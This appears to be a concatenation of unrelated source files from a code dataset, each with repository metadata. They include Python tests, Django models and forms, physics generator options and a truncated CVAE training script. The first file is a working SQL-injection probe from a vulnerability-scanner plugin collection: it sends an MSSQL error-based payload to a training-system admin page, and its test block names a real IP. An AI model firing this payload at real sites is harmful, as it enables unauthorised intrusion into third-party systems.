"calemasanga@gmail.com"
] | calemasanga@gmail.com |
0554493246cab9a13e295982e86c557585680403 | e0c8662a56d89730043146ddc340e9e0b9f7de72 | /plugin/11dde802-1596.py | 7382d4960741b91aca87fcdb6f1f45c45dde3640 | [] | no_license | izj007/bugscan_poc | f2ef5903b30b15c230b292a1ff2dc6cea6836940 | 4490f3c36d4033bdef380577333722deed7bc758 | refs/heads/master | 2020-09-22T17:20:50.408078 | 2019-01-18T09:42:47 | 2019-01-18T09:42:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | #coding:utf-8
from lib.curl import *
# -*- coding: utf-8 -*-
"""
POC Name : 企慧通培训系统通用型SQL注入 2
Author : a
mail : a@lcx.cc
refer : http://www.wooyun.org/bugs/wooyun-2015-0129326
"""
def assign(service, arg):
    # Only claim targets fingerprinted as the QHT online training system;
    # any other service id is declined (implicit None in the original).
    if service != 'qht_study':
        return None
    return True, arg
def audit(arg):
    """Probe ``arg`` (site base URL) for the SQL injection.

    Appends an MSSQL error-based injection payload that computes
    hashbytes(MD5, '1234'); if the response is a 500 page containing the
    hex digest of MD5('1234') (0x81dc9bdb...), the target is vulnerable
    and is reported via security_hole()."""
    p = "SysAdmin/aRegisAdmin.aspx?type=regisAdmin&clientid=adminName&adminName=admin'%20and%20sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))>0--"
    url = arg + p
    # curl2 is the scanner framework's HTTP helper; unpacks status, headers, body.
    code2, head, res, errcode, _ = curl.curl2(url )
    if (code2 ==500) and ('0x81dc9bdb52d04dc20036dbd8313ed055' in res):
        security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('qht_study', 'http://124.193.233.233/')[1]) | [
"yudekui@wsmtec.com"
] | yudekui@wsmtec.com |
2a493183c3d04027dce5a0966c86c5e83e023540 | 8f2f83bc1381d4ce7fc968aec72fa400aae4155d | /api/smartcontractwallet/requestmodels/createtransactionrequest.py | 45a7a4eb65363aeada372be706d0cc2d9c527908 | [
"MIT"
] | permissive | nifrali/pyStratis | c855fb33be77064c9a741255e324003319a4789f | b1a80bf155b7941e9ef8fc2ea93fa1b08a0c4366 | refs/heads/master | 2023-06-20T16:02:30.863589 | 2021-07-01T19:24:18 | 2021-07-01T19:24:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,929 | py | from typing import Optional, List
from pydantic import Field, SecretStr, validator, conint
from pybitcoin import Model, Outpoint, SmartContractParameter
from pybitcoin.types import Address, Money, hexstr
class CreateContractTransactionRequest(Model):
    """A request model for the smartcontractwallet/create endpoint.

    Args:
        wallet_name (str): The wallet name.
        account_name (str, optional): The account name. Default='account 0'
        outpoints (List[Outpoint], optional): A list of the outpoints used to construct the transactation.
        amount (Money, optional): The amount being sent.
        fee_amount (Money): The fee amount. Must not exceed 1 (validated).
        password (SecretStr): The password.
        contract_code (hexstr): The smart contract code hexstring.
        gas_price (int): The amount of gas being used in satoshis (100-10000).
        gas_limit (int): The maximum amount of gas that can be used in satoshis (12000-250000).
        sender (Address): The address of the sending address.
        parameters (List[SmartContractParameters], optional): A list of parameters for the smart contract.
    """
    # Aliases map pythonic names onto the camelCase JSON the node API expects.
    wallet_name: str = Field(alias='walletName')
    account_name: Optional[str] = Field(default='account 0', alias='accountName')
    outpoints: Optional[List[Outpoint]]
    amount: Optional[Money]
    fee_amount: Money = Field(alias='feeAmount')
    password: SecretStr
    contract_code: hexstr = Field(alias='contractCode')
    gas_price: conint(ge=100, le=10000) = Field(alias='gasPrice')
    gas_limit: conint(ge=12000, le=250000) = Field(alias='gasLimit')
    sender: Address
    parameters: Optional[List[SmartContractParameter]]

    # noinspection PyMethodParameters,PyUnusedLocal
    @validator('fee_amount', always=True)
    def check_fee_too_high(cls, v, values):
        # Guard against a fat-finger fee: anything above 1 is rejected.
        if v is not None:
            if v > Money(1):
                raise ValueError('Fee should not be more than 1. Check parameters.')
        return v
| [
"skaal@protonmail.com"
] | skaal@protonmail.com |
8c3c54a6db6ad3c4483c0d3590021ca975729a91 | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /Gauss_v45r9/Gen/DecFiles/options/27495730.py | fbd2677bd68269f36de53c1ffd7c30736c15bdcc | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,001 | py | # file /home/hep/ss4314/cmtuser/Gauss_v45r9/Gen/DecFiles/options/27495730.py generated: Fri, 27 Mar 2015 16:10:18
#
# Event Type: 27495730
#
# ASCII decay Descriptor: {[ D_s2*+ -> D0 K+, D*0 K+, D+ K_S0, D*+ K_S0 ]cc}
#
from Configurables import Generation
Generation().EventType = 27495730
Generation().SampleGenerationTool = "SignalPlain"
from Configurables import SignalPlain
Generation().addTool( SignalPlain )
Generation().SignalPlain.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Ds2st_2710=DecProdCut.dec"
Generation().SignalPlain.CutTool = "DaughtersInLHCb"
Generation().SignalPlain.SignalPIDList = [ 435,-435 ]
from Configurables import LHCb__ParticlePropertySvc
LHCb__ParticlePropertySvc().Particles = [ "D*_s2+ 174 435 1.0 2.710 4.388079327e-24 D_s2*+ 435 0.351483","D*_s2- 178 -435 -1.0 2.710 4.388079327e-24 D_s2*- -435 0.351483" ]
| [
"slavomirastefkova@b2pcx39016.desy.de"
] | slavomirastefkova@b2pcx39016.desy.de |
6af55db5f3c9b0295b930e7f55c893d74261ebfc | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03597/s285485518.py | 0cfbe771bc66bf9c607b389302e54701b59d4ae2 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 67 | py | N = int(input())
A = int(input())
black = (N * N - A)
print(black) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
af68b0329ba63995851e1b1bb606430cffd086fe | 954ceac52dfe831ed7c2b302311a20bb92452727 | /tests/python/relax/test_vm_execbuilder.py | 9a7cd0c87938eb15f27084ffd2f7b3f5b4afc5fc | [
"Apache-2.0",
"LLVM-exception",
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"Zlib",
"Unlicense",
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | tqchen/tvm | a0e4aefe8b8dccbdbe6f760549bed6e9545ad4a1 | 678d01dd4a4e75ef6186ce356bb1a20e584a7b24 | refs/heads/main | 2023-08-10T02:21:48.092636 | 2023-02-25T18:22:10 | 2023-02-25T18:22:10 | 100,638,323 | 23 | 8 | Apache-2.0 | 2023-02-20T16:28:46 | 2017-08-17T19:30:37 | Python | UTF-8 | Python | false | false | 8,597 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Lowest level testing VM. Test execbuilder and execution."""
import tvm
import pytest
import numpy as np
from tvm import relax, TVMError
from tvm.relax.testing.vm import check_saved_func
def test_vm_execute():
    """Build a one-function VM executable via ExecBuilder and check that
    the 'test.vm.add' packed call adds two NDArrays elementwise."""
    ib = relax.ExecBuilder()
    with ib.function("func0", num_inputs=2):
        # r(0), r(1) are the inputs; result lands in register r(2).
        ib.emit_call("test.vm.add", args=[ib.r(0), ib.r(1)], dst=ib.r(2))
        ib.emit_ret(ib.r(2))
    ex = ib.get()
    vm = relax.VirtualMachine(ex, tvm.cpu())
    a = tvm.nd.array(
        np.random.rand(
            4,
        )
    )
    b = tvm.nd.array(
        np.random.rand(
            4,
        )
    )
    # check_saved_func also round-trips the executable through save/load.
    add_res = check_saved_func(vm, "func0", a, b)
    tvm.testing.assert_allclose(add_res.numpy(), a.numpy() + b.numpy(), rtol=1e-7, atol=1e-7)
def test_vm_multiple_func():
ib = relax.ExecBuilder()
with ib.function("func0", num_inputs=2):
ib.emit_call("test.vm.add", args=[ib.r(0), ib.r(1)], dst=ib.r(2))
ib.emit_ret(ib.r(2))
with ib.function("func1", num_inputs=2):
ib.emit_call("test.vm.mul", args=[ib.r(0), ib.r(1)], dst=ib.r(2))
ib.emit_ret(ib.r(2))
ex = ib.get()
vm = relax.VirtualMachine(ex, tvm.cpu())
a = tvm.nd.array(
np.random.rand(
4,
)
)
b = tvm.nd.array(
np.random.rand(
4,
)
)
mul_res = check_saved_func(vm, "func1", a, b)
add_res = check_saved_func(vm, "func0", a, b)
tvm.testing.assert_allclose(add_res.numpy(), a.numpy() + b.numpy(), rtol=1e-7, atol=1e-7)
tvm.testing.assert_allclose(mul_res.numpy(), a.numpy() * b.numpy(), rtol=1e-7, atol=1e-7)
def test_vm_checker():
    """The builder must reject reading register r(2) before it is written:
    finalizing such a function raises TVMError."""
    ib = relax.ExecBuilder()
    with pytest.raises(TVMError):
        with ib.function("func0", num_inputs=2):
            # r(2) is used as an input before any instruction defines it.
            ib.emit_call("test.vm.add", args=[ib.r(0), ib.r(2)], dst=ib.r(2))
            ib.emit_ret(ib.r(2))
        ib.get()
def test_neg_imm():
    """Negative immediate operands must survive encoding: adding imm(-3)
    to a scalar argument produces the expected sums."""
    ib = relax.ExecBuilder()
    with ib.function("func0", num_inputs=1):
        ib.emit_call("test.vm.add_scalar", args=[ib.imm(-3), ib.r(0)], dst=ib.r(1))
        ib.emit_ret(ib.r(1))
    ib.get()
    ex = ib.get()
    vm = relax.VirtualMachine(ex, tvm.cpu())
    assert vm["func0"](1) == -2
    assert vm["func0"](-3) == -6
assert vm["func0"](-3) == -6
def test_emit_cache():
ib = relax.ExecBuilder()
with ib.function("func0", num_inputs=1):
x0 = ib.convert_constant("str0")
x1 = ib.convert_constant("str0")
# cache constant str
assert x0 == x1
s0 = ib.convert_constant(tvm.runtime.container.ShapeTuple([1, 2]))
s1 = ib.convert_constant(tvm.runtime.container.ShapeTuple([1, 2]))
s2 = ib.convert_constant(tvm.runtime.container.ShapeTuple([1, 3]))
assert s0 == s1
assert s1 != s2
y0 = ib.convert_constant(tvm.nd.array(np.array([1, 2, 3]).astype("int32")))
y1 = ib.convert_constant(tvm.nd.array(np.array([1, 2, 3]).astype("int32")))
assert y0 == y1
ib.emit_ret(ib.r(0))
def test_vm_formalize():
ib0 = relax.ExecBuilder()
ib1 = relax.ExecBuilder()
with ib0.function("func0", num_inputs=2):
ib0.emit_call("test.vm.add", args=[ib0.r(0), ib0.r(1)], dst=ib0.r(100))
ib0.emit_call("test.vm.mul", args=[ib0.r(1), ib0.r(100)], dst=ib0.r(50))
ib0.emit_ret(ib0.r(50))
with ib1.function("func0", num_inputs=2):
ib1.emit_call("test.vm.add", args=[ib1.r(0), ib1.r(1)], dst=ib1.r(2))
ib1.emit_call("test.vm.mul", args=[ib1.r(1), ib1.r(2)], dst=ib1.r(3))
ib1.emit_ret(ib1.r(3))
exec0 = ib0.get()
exec1 = ib1.get()
assert exec0.as_text() == exec1.as_text()
def test_vm_operand():
ib0 = relax.ExecBuilder()
with ib0.function("func0", num_inputs=2):
ib0.emit_call("test.vm.add_scalar", args=[ib0.r(0), ib0.r(1)], dst=ib0.r(2))
ib0.emit_ret(ib0.r(2))
exec0 = ib0.get()
vm = relax.VirtualMachine(exec0, tvm.cpu())
res = vm["func0"](2, 3)
assert res == 5
ib1 = relax.ExecBuilder()
with ib1.function("func1", num_inputs=1):
ib1.emit_call("test.vm.get_device_id", args=[ib1.r(0)], dst=ib1.r(1))
ib1.emit_ret(ib1.r(1))
exec1 = ib1.get()
vm = relax.VirtualMachine(exec1, tvm.cpu())
res = vm["func1"](tvm.cpu(3))
assert res == 3
def test_vm_shapeof():
    """vm.builtin.shape_of on a constant NDArray must return its shape
    tuple element-for-element."""
    ib = relax.ExecBuilder()
    shape = (32, 16)
    arr = tvm.nd.array(np.random.rand(*shape))
    with ib.function("main", num_inputs=0):
        # The NDArray is embedded as a constant operand of the call.
        ib.emit_call("vm.builtin.shape_of", args=[arr], dst=ib.r(0))
        ib.emit_ret(ib.r(0))
    ex = ib.get()
    vm = relax.VirtualMachine(ex, tvm.cpu())
    res = vm["main"]()
    for i, s in enumerate(res):
        assert s == shape[i]
def test_vm_storage():
dtype = tvm.DataType("float32")
shape = (4, 6)
ib = relax.ExecBuilder()
with ib.function("main", num_inputs=0):
ib.emit_call(
"vm.builtin.alloc_storage",
args=[ib.vm_state(), (24,), ib.convert_constant(0), dtype],
dst=ib.r(1),
)
ib.emit_call(
"vm.builtin.alloc_tensor", args=[ib.r(1), ib.imm(0), shape, dtype], dst=ib.r(2)
)
ib.emit_ret(ib.r(2))
ex = ib.get()
vm = relax.VirtualMachine(ex, tvm.cpu())
res = vm["main"]()
assert res.device == tvm.cpu()
assert res.shape == shape
def test_vm_goto():
ib = relax.ExecBuilder()
with ib.function("main", num_inputs=2):
ib.emit_call("test.vm.add", args=[ib.r(0), ib.r(1)], dst=ib.r(2))
ib.emit_goto(2)
ib.emit_call("test.vm.mul", args=[ib.r(2), ib.r(1)], dst=ib.r(2))
ib.emit_ret(ib.r(2))
ex = ib.get()
vm = relax.VirtualMachine(ex, tvm.cpu())
a = tvm.nd.array(
np.random.rand(
4,
)
)
b = tvm.nd.array(
np.random.rand(
4,
)
)
res = check_saved_func(vm, "main", a, b)
tvm.testing.assert_allclose(res.numpy(), a.numpy() + b.numpy(), rtol=1e-7, atol=1e-7)
def test_vm_if():
ib = relax.ExecBuilder()
with ib.function("main", num_inputs=3):
ib.emit_if(ib.r(0), 3)
ib.emit_call("test.vm.add", args=[ib.r(1), ib.r(2)], dst=ib.r(3))
ib.emit_goto(2)
ib.emit_call("test.vm.mul", args=[ib.r(1), ib.r(2)], dst=ib.r(3))
ib.emit_ret(ib.r(3))
ex = ib.get()
vm = relax.VirtualMachine(ex, tvm.cpu())
a = tvm.nd.array(
np.random.rand(
4,
)
)
b = tvm.nd.array(
np.random.rand(
4,
)
)
res = vm["main"](0, a, b)
tvm.testing.assert_allclose(res.numpy(), a.numpy() * b.numpy(), rtol=1e-7, atol=1e-7)
res = vm["main"](1, a, b)
tvm.testing.assert_allclose(res.numpy(), a.numpy() + b.numpy(), rtol=1e-7, atol=1e-7)
def test_vm_invoke_closure():
ib = relax.ExecBuilder()
with ib.function("lifted_func_1", num_inputs=4):
ib.emit_call("test.vm.add", args=[ib.r(0), ib.r(1)], dst=ib.r(4))
ib.emit_call("test.vm.add", args=[ib.r(2), ib.r(4)], dst=ib.r(5))
ib.emit_call("test.vm.add", args=[ib.r(3), ib.r(5)], dst=ib.r(6))
ib.emit_ret(ib.r(6))
with ib.function("main", num_inputs=2):
ib.emit_call(
"vm.builtin.make_closure", args=[ib.f("lifted_func_1"), ib.r(0), ib.r(1)], dst=ib.r(2)
)
ib.emit_ret(ib.r(2))
ex = ib.get()
vm = relax.VirtualMachine(ex, tvm.cpu())
w_inp = tvm.nd.array(np.random.rand(2, 3))
x_inp = tvm.nd.array(np.random.rand(2, 3))
y_inp = tvm.nd.array([[3.1, 4.0, 5.0], [6.0, 7.1, 9.0]])
z_inp = tvm.nd.array(np.random.rand(2, 3))
clo = vm["main"](w_inp, x_inp)
res = vm.invoke_closure(clo, y_inp, z_inp)
tvm.testing.assert_allclose(
res.numpy(), w_inp.numpy() + x_inp.numpy() + y_inp.numpy() + z_inp.numpy()
)
if __name__ == "__main__":
tvm.testing.main()
| [
"tianqi.tchen@gmail.com"
] | tianqi.tchen@gmail.com |
54799a216da1ac96622d8c6b155e31f987d78435 | 03b724302ee3989b97ea11c5323fab639349661a | /thjobsthai/migrations/0001_initial.py | bf3cce65c0e0a00c06cc5eb40a971a42a4608a32 | [] | no_license | saisai/django_jobs_apply | 8e2eccd9e0884d2788d09407c24da12b4c80de53 | 816602e05bdfbef8d5306ca3592fa0d4df538c5e | refs/heads/master | 2022-12-01T19:54:36.119216 | 2020-08-18T23:31:21 | 2020-08-18T23:31:21 | 288,165,221 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 730 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-10 06:37
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: create the JobThai model backed by the
    ``job_thai`` table (title, link, created_date)."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='JobThai',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=500)),
                ('link', models.TextField()),
                ('created_date', models.DateField()),
            ],
            options={
                'db_table': 'job_thai',
            },
        ),
    ]
| [
"you@example.com"
] | you@example.com |
3d34bbaa9221ae9eaeb9290f8d4c2c6720415cc8 | 02e5ec4b8b038d335d726d12047d5dacea01456e | /person_django_rest_swagger/serializers.py | b2cc273d6ea98a7394b26d6304baca7b2bcc0e4b | [] | no_license | rahulmoundekar/django_rest_curd_app_swagger | d298d18356ac9253b16320255b329aacd4904a56 | 3473812ae21c5be7b8f2105e8d16aebab54d4fa8 | refs/heads/master | 2021-05-24T19:08:27.658832 | 2020-04-07T06:58:52 | 2020-04-07T06:58:52 | 253,710,900 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py | from rest_framework import serializers
from person_django_rest_swagger.models import Person
class PersonSerializer(serializers.ModelSerializer):
    """DRF serializer exposing every field of the Person model."""
    class Meta:
        model = Person
        fields = '__all__'
| [
"rahulmoundekar44@gmail.com"
] | rahulmoundekar44@gmail.com |
72e629552847f36e6921f8e65c120df05721b1c7 | 9e2d79a2cf1dbeaffe8ef897bb53f94af8b5b68c | /ichnaea/models/tests/test_mac.py | 68cca667cd7319c1acf7541ccab7d0f515cab920 | [
"Apache-2.0"
] | permissive | amolk4games/ichnaea | a7d1cbd12b6aa5c0d877fca380080b08fcff24b8 | 907c542da05b428c8e994bce1537390e22b3ca58 | refs/heads/master | 2021-01-19T07:21:54.851167 | 2016-04-08T15:20:37 | 2016-04-08T15:21:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,198 | py | from ichnaea.models.mac import (
decode_mac,
encode_mac,
)
from ichnaea.tests.base import (
TestCase,
)
class TestMacCodec(TestCase):
    """Round-trip tests for encode_mac/decode_mac: a 12-hex-digit MAC
    maps to 6 raw bytes, or to 8 base64 characters with codec='base64'."""

    def test_decode(self):
        value = decode_mac(b'\xab\xcd\xed\x124V')
        self.assertEqual(value, 'abcded123456')

        # Same MAC, base64-encoded form.
        value = decode_mac(b'q83tEjRW', codec='base64')
        self.assertEqual(value, 'abcded123456')

    def test_encode(self):
        value = encode_mac('abcded123456')
        self.assertEqual(len(value), 6)
        self.assertEqual(value, b'\xab\xcd\xed\x124V')

        value = encode_mac('abcded123456', codec='base64')
        self.assertEqual(value, b'q83tEjRW')

    def test_max(self):
        # Highest possible MAC: all bits set.
        value = encode_mac('ffffffffffff')
        self.assertEqual(len(value), 6)
        self.assertEqual(value, b'\xff\xff\xff\xff\xff\xff')

        value = encode_mac('ffffffffffff', codec='base64')
        self.assertEqual(value, b'////////')

    def test_min(self):
        # Lowest possible MAC: all zero bytes.
        value = encode_mac('000000000000')
        self.assertEqual(len(value), 6)
        self.assertEqual(value, b'\x00\x00\x00\x00\x00\x00')

        value = encode_mac('000000000000', codec='base64')
        self.assertEqual(value, b'AAAAAAAA')
| [
"hanno@hannosch.eu"
] | hanno@hannosch.eu |
d6173e859ed2ee3b0ead3b81a2fbabed554928d5 | 82555c9b4615a14bfe4bb46a0981820b7ccba8d7 | /D/test_pasted_from_page.py | 584aee8f24d578cb618a5ce84a837a36ea5a8976 | [
"MIT"
] | permissive | staguchi0703/ABC160 | 2f3cc23e0566943a76f288d190ee4977131817bb | d71c9756a2195a4f8b98dc0bb2d220e90cacdce3 | refs/heads/master | 2021-05-17T10:56:30.289570 | 2020-03-28T13:47:29 | 2020-03-28T13:47:29 | 250,745,685 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,137 | py | #
from resolve import resolve
####################################
####################################
# 以下にプラグインの内容をペーストする
#
import sys
from io import StringIO
import unittest
class TestClass(unittest.TestCase):
def assertIO(self, input, output):
stdout, stdin = sys.stdout, sys.stdin
sys.stdout, sys.stdin = StringIO(), StringIO(input)
resolve()
sys.stdout.seek(0)
out = sys.stdout.read()[:-1]
sys.stdout, sys.stdin = stdout, stdin
self.assertEqual(out, output)
def test_入力例_1(self):
input = """5 2 4"""
output = """5
4
1
0"""
self.assertIO(input, output)
def test_入力例_2(self):
input = """3 1 3"""
output = """3
0"""
self.assertIO(input, output)
def test_入力例_3(self):
input = """7 3 7"""
output = """7
8
4
2
0
0"""
self.assertIO(input, output)
def test_入力例_4(self):
input = """10 4 8"""
output = """10
12
10
8
4
1
0
0
0"""
self.assertIO(input, output)
if __name__ == "__main__":
unittest.main() | [
"s.taguchi0703@gmail.com"
] | s.taguchi0703@gmail.com |
a867dfcb3aaf4c1336a595ff3acbdb224162f108 | 80a1be2c9642341545e625685886ed8c93ed23b9 | /arriendoMiLibro/misLibrosOwner/forms.py | df2006d27b344b2e36f793597f6a4f7bb93ae2a6 | [] | no_license | leoBravoRain/arriendoMiLibro | 94a1923b68b052c3fd719412775db37508589459 | 35afd4b65385c15fd8372722200796329a225218 | refs/heads/master | 2020-08-07T16:09:06.065021 | 2018-06-26T02:34:55 | 2018-06-26T02:34:55 | 131,909,292 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,345 | py | # -*- coding: utf-8 -*-
from django import forms
from libros.models import LibrosParaArrendar
from django.forms import ModelForm
from usuarios.models import Usuario
from arriendoMiLibro.variablesGlobales import maxLengthDefault
# Form for editing a user's profile information
class EditarInformacionPerfilUsuario(ModelForm):
    # ciudad = forms.ChoiceField(choices = Ciudad.objects.all())
    class Meta:
        model = Usuario
        # user/email/password are managed elsewhere; fechaCreacion is immutable.
        exclude = ["user","email","fechaCreacion", "password"]
        widgets = {
            'nombre': forms.TextInput(attrs={'placeholder': 'Nombre'}),
            'numeroContacto': forms.TextInput(attrs={'placeholder': 'Numero de contacto'}),
            # 'password': forms.PasswordInput(attrs={'placeholder': 'Clave'}),
        }
# Form for editing an existing book
class EditarLibro(ModelForm):
    class Meta:
        model = LibrosParaArrendar
        # owner/creation date/state are not user-editable here.
        exclude = ['owner','fechaCreacion','estado']
        widgets = {
            'titulo': forms.TextInput(attrs={'placeholder': 'Titulo de libro'}),
            'autor': forms.TextInput(attrs={'placeholder': 'Autor del libro'}),
            'resumen': forms.Textarea(attrs={'placeholder': 'Breve resumen del libro', "maxlength" : maxLengthDefault, "size": maxLengthDefault, "class": "img-responsive"}),
            'comentario': forms.Textarea(attrs={'placeholder': 'Comentario (idioma, estado del libro, etc)', "maxlength" : 10, "class": "img-responsive"}),
        }
# Formulario para registrar a un owner
class AgregarLibro(ModelForm):
class Meta:
model = LibrosParaArrendar
exclude = ['owner','fechaCreacion','estado']
widgets = {
'titulo': forms.TextInput(attrs={'placeholder': 'Titulo de libro'}),
'autor': forms.TextInput(attrs={'placeholder': 'Autor del libro'}),
'resumen': forms.Textarea(attrs={'placeholder': 'Breve resumen del libro', "maxlength" : maxLengthDefault, "size": maxLengthDefault, "class": "img-responsive"}),
'comentario': forms.Textarea(attrs={'placeholder': 'Comentario (idioma, estado del libro, etc)', "maxlength" : 10, "class": "img-responsive"}),
}
help_texts = {
'foto' : 'Foto del libro',
}
# Fomulario para cambiar estado de libro
class CambiarEstadoDeLibro(ModelForm):
class Meta:
model = LibrosParaArrendar
fields = ["estado"]
| [
"gian.bravo@alumnos.usm.cl"
] | gian.bravo@alumnos.usm.cl |
1d7317c5593e293840bf5e1d1e80b861458d9130 | 99d8895888ab093b06a3ba03594f2a74cb97758f | /Scripts/Python_HSE/WEEK2/homework/solution15.py | e75292d209cd5b619f3431e2ffa630d73aa835f8 | [] | no_license | AlekseyAbakumov/PythonLearn | 4c35efeb0996f4a3221f228b57e30d595bb62637 | fdd2cc9bdaa0fac3d582ddd5f2fbf9018218bda5 | refs/heads/master | 2023-03-23T20:12:42.603817 | 2021-03-16T18:22:48 | 2021-03-16T18:22:48 | 265,309,409 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 124 | py | a, b, c = (int(input()) for _ in range(3))
print(min(a, b, c), a + b + c - max(a, b, c) -
min(a, b, c), max(a, b, c))
| [
"a-starostin@mail.ru"
] | a-starostin@mail.ru |
c19ed886a185c04770d68ef2431f81e0caaa0cea | 9e594874044c08103d6f1a51b7ae79e44e09f769 | /UTKFace/CVAE/main.py | 7d892295b783460633f308abdb3af283f1b3d6a8 | [] | no_license | UBCDingXin/extra_experiments | 032239e6a98f273f84278425632834ead2a1faed | c424030e67069e13f7790186d15a0de2363abc1f | refs/heads/main | 2023-07-06T14:30:24.527329 | 2021-08-04T05:30:27 | 2021-08-04T05:30:27 | 382,233,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,973 | py | print("\n===================================================================================================")
import argparse
import copy
import gc
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.use('Agg')
import h5py
import os
import random
from tqdm import tqdm
import torch
import torchvision
import torch.nn as nn
import torch.backends.cudnn as cudnn
from torchvision.utils import save_image
import timeit
from PIL import Image
from opts import parse_opts
args = parse_opts()
wd = args.root_path
os.chdir(wd)
from utils import *
from models import *
from trainer import train_cvae, sample_cvae_given_labels
from eval_metrics import cal_FID, cal_labelscore
#######################################################################################
''' Settings '''
#######################################################################################
#-------------------------------
# seeds
random.seed(args.seed)
torch.manual_seed(args.seed)
torch.backends.cudnn.deterministic = True
cudnn.benchmark = False
np.random.seed(args.seed)
#-------------------------------
# sampling parameters
assert args.eval_mode in [1,2,3,4] #evaluation mode must be in 1,2,3,4
if args.data_split == "all":
args.eval_mode != 1
#-------------------------------
# output folders
path_to_output = os.path.join(wd, "output/output_cvae_dimz_{}_dimc_{}_lr_{}".format(args.dim_z, args.dim_c, args.lr))
os.makedirs(path_to_output, exist_ok=True)
save_models_folder = os.path.join(path_to_output, 'saved_models')
os.makedirs(save_models_folder, exist_ok=True)
save_images_folder = os.path.join(path_to_output, 'saved_images')
os.makedirs(save_images_folder, exist_ok=True)
#######################################################################################
''' Data loader '''
#######################################################################################
# data loader
data_filename = args.data_path + '/UTKFace_{}x{}.h5'.format(args.img_size, args.img_size)
hf = h5py.File(data_filename, 'r')
labels = hf['labels'][:]
labels = labels.astype(float)
images = hf['images'][:]
hf.close()
# subset of UTKFace
selected_labels = np.arange(args.min_label, args.max_label+1)
for i in range(len(selected_labels)):
curr_label = selected_labels[i]
index_curr_label = np.where(labels==curr_label)[0]
if i == 0:
images_subset = images[index_curr_label]
labels_subset = labels[index_curr_label]
else:
images_subset = np.concatenate((images_subset, images[index_curr_label]), axis=0)
labels_subset = np.concatenate((labels_subset, labels[index_curr_label]))
# for i
images = images_subset
labels = labels_subset
del images_subset, labels_subset; gc.collect()
raw_images = copy.deepcopy(images)
raw_labels = copy.deepcopy(labels)
### show some real images
if args.show_real_imgs:
unique_labels_show = sorted(list(set(labels)))
nrow = len(unique_labels_show); ncol = 10
images_show = np.zeros((nrow*ncol, images.shape[1], images.shape[2], images.shape[3]))
for i in range(nrow):
curr_label = unique_labels_show[i]
indx_curr_label = np.where(labels==curr_label)[0]
np.random.shuffle(indx_curr_label)
indx_curr_label = indx_curr_label[0:ncol]
for j in range(ncol):
images_show[i*ncol+j,:,:,:] = images[indx_curr_label[j]]
print(images_show.shape)
images_show = (images_show/255.0-0.5)/0.5
images_show = torch.from_numpy(images_show)
save_image(images_show.data, save_images_folder +'/real_images_grid_{}x{}.png'.format(nrow, ncol), nrow=ncol, normalize=True)
# for each age, take no more than args.max_num_img_per_label images
image_num_threshold = args.max_num_img_per_label
print("\n Original set has {} images; For each age, take no more than {} images>>>".format(len(images), image_num_threshold))
unique_labels_tmp = np.sort(np.array(list(set(labels))))
for i in tqdm(range(len(unique_labels_tmp))):
indx_i = np.where(labels == unique_labels_tmp[i])[0]
if len(indx_i)>image_num_threshold:
np.random.shuffle(indx_i)
indx_i = indx_i[0:image_num_threshold]
if i == 0:
sel_indx = indx_i
else:
sel_indx = np.concatenate((sel_indx, indx_i))
images = images[sel_indx]
labels = labels[sel_indx]
print("{} images left.".format(len(images)))
hist_filename = wd + "/histogram_before_replica_unnormalized_age_" + str(args.img_size) + 'x' + str(args.img_size)
num_bins = len(list(set(labels)))
plt.figure()
plt.hist(labels, num_bins, facecolor='blue', density=False)
plt.savefig(hist_filename)
## replicate minority samples to alleviate the imbalance
max_num_img_per_label_after_replica = np.min([args.max_num_img_per_label_after_replica, args.max_num_img_per_label])
if max_num_img_per_label_after_replica>1:
unique_labels_replica = np.sort(np.array(list(set(labels))))
num_labels_replicated = 0
print("Start replicating monority samples >>>")
